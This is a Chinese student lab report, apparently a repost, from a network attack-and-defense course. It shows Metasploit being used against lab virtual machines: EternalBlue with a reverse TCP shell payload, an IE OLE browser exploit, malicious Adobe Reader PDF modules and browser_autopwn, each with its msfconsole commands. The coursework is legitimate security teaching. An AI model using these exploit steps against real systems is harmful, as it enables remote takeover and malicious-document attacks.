zoukankan      html  css  js  c++  java
  • 2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用

    Exploit选取

    • 主动攻击:ms17_010_eternalblue(成功)

    • 浏览器攻击:

    • ms10_042_helpctr_xss_cmd_exec (失败)

    • ms4_064_ole_code_execution(成功)

    • 客户端攻击:

    • adobe_toolbutton (成功且唯一)

    • adobe_pdf_embedded_exe(成功)

    • 成功应用任何一个辅助模块:browser_autopwn(成功且唯一)

    课上问题思考

    • Exploit:网上的解释是Exploit 的英文意思为利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),有Exploit就肯定有漏洞。我自己的理解是一种攻击模块。
    • Payload:字面意思 “有效载荷,有效负荷,有效载重”。对于程序员来说就是在程序中起关键作用的代码。
    • Encode:对payload进行一定程度的编码,从而使之达到免杀的程度

    实验步骤

    实验一:使用ms17_010_eternalblue进行主动攻击(靶机:Windows Server 2008 R2 (x64) )

    • 首先进入msf的模块目录下,查看可用的exploit

    • 进入msfconsole,查看适用的靶机系统版本以及需要设置的参数项等相关信息

    • 使用该模块,进行设置(靶机IP:192.168.245.134; 攻击机IP:192.168.245.132)

    use exploit/windows/smb/ms17_010_eternalblue.rb  //使用该模块
    show payloads  //查看载荷
    set payload generic/shell_reverse_tcp  //使用tcp反弹连接
    set LHOST 192.168.245.132  //设置攻击机的IP,即KALI的IP地址
    set LPORT 5227  //设置攻击端口
    set RHOST 192.168.245.134  //设置靶机IP
    set target 0  //选择自动目标系统类型
    

    • 使用exploit 进行监听攻击
    • 攻击成功

    实验二:使用ms14_064_ole_code_execution进行浏览器攻击(靶机:winXP SP3 IE 8)

    • 使用search 命令查找有关浏览器攻击的漏洞
    • 攻击过程:
    use exploit/windows/browser/ms14_064_ole_code_execution
    info
    
    • 查看配置信息

    • 允许的版本

    • 描述

    描述:此模块利用Windows OLE自动化阵列漏洞,CVE-2014-6332。已知该漏洞会影响互联网在Windows 95到Windows 10之间的版本11之前的资源管理器3.0,没有Windows XP的补丁。然而,这种攻击只针对由于PowerShell限制,Windows XP和Windows 7框。默认情况下,Windows XP支持vbs,因此它用作攻击向量。在其他较新的Windows系统上,该漏洞将尝试改用PowerShell
    
    • 设置相关信息

    • 攻击成功

    实验三:客户端攻击(靶机:winXP+Adobe Reader 9.3)

    使用adobe_toolbutton 进行客户端攻击(成功且唯一)
    • 通过search 命令查找到适合攻击的漏洞
    • 过程
    use windows/fileformat/adobe_toolbutton
    info
    
    • 相关信息

    • 描述

    描述:此模块利用Adobe Reader上的“空闲后使用”条件11.0.2、10.1.6和9.5.4及更高版本。脆弱性在处理toolbutton对象时存在,其中回调可用于提前释放对象内存。以后使用对象允许在空闲条件下触发使用。这个模块已在Adobe Reader 11.0.2、10.0.4上成功测试。
    
    • 进行相关设置,生成PDF文件

    • 将PDF文件传入靶机中

    • kali攻击机打开监听模式

    • 靶机打开PDF文件,攻击成功,获得权限

    使用adobe_pdf_embedded_exe 进行客户端攻击
    • 通过search 命令查找到适合攻击的漏洞
    • 攻击过程
    use windows/fileformat/adobe_pdf_embedded_exe
    info
    
    • 相关信息
    描述:此模块利用智能独立的在版本8.2.4和9.3.4中的glyplets(sing)表处理Adobe阅读器以前的版本也被认为是易受攻击的
    
    • 生成文件

    • 切换成监听模式

    • 在靶机中打开PDF文件,攻击成功

    实验四:browser_autopwn 辅助模块(成功且唯一)

    • 通过search auxiliary 查找辅助模块,找到适合的进行运行
    • 过程
    use auxiliary/server/browser_autopwn
    info
    set SRVHOST 172.30.0.189
    set SRVPORT 5227
    set LHOST 17.30.0.189
    run 
    
    • 相关信息

    • 描述

    描述:这个模块有三个动作。第一个(和默认值)是使用客户端和服务器端组合的“webserver”对HTTP客户端进行指纹识别,然后自动利用它们。接下来是“defangeddetection”,它只执行指纹部分。最后,“list”只打印所有利用Web服务器操作将使用的模块当前匹配和排除选项。还添加了一个“list”命令,与运行action=list相同
    
    • 攻击成功

    实验感想

    • 这次的实验让我们充分体验了一把,寻找漏洞,寻找靶机,然后进行攻击。过程是十分不容易的,因为靶机类型、浏览器版本、客户端版本,都对攻击的结果有而很大的影响,是决定是否攻击成功的关键部分,也是漏洞不好找,攻击不好攻击的一方面,不过在这个实验过程中也是让自己对于网络攻防这门课有了更加深刻的认识,希望还能学习到很多有意思的知识。
  • 相关阅读:
    Xamarin.Forms
    Docker Azure Kubernetes
    出现( linker command failed with exit code 1)错误总结(http://blog.csdn.net/hengshujiyi/article/details/21182813)
    UITextView学习笔记
    UIScrollView学习笔记
    如何学习ios(摘自知乎https://www.zhihu.com/question/20016551)
    iOS手势操作,拖动,轻击,捏合,旋转,长按,自定义(http://www.cnblogs.com/huangjianwu/p/4675648.html)
    触屏事件
    给UITextView添加链接
    IOS绘图详解(http://blog.163.com/wkyuyang_001/blog/static/10802122820133190545227/)
  • 原文地址:https://www.cnblogs.com/zhuyue-study/p/10730984.html
Copyright © 2011-2022 走看看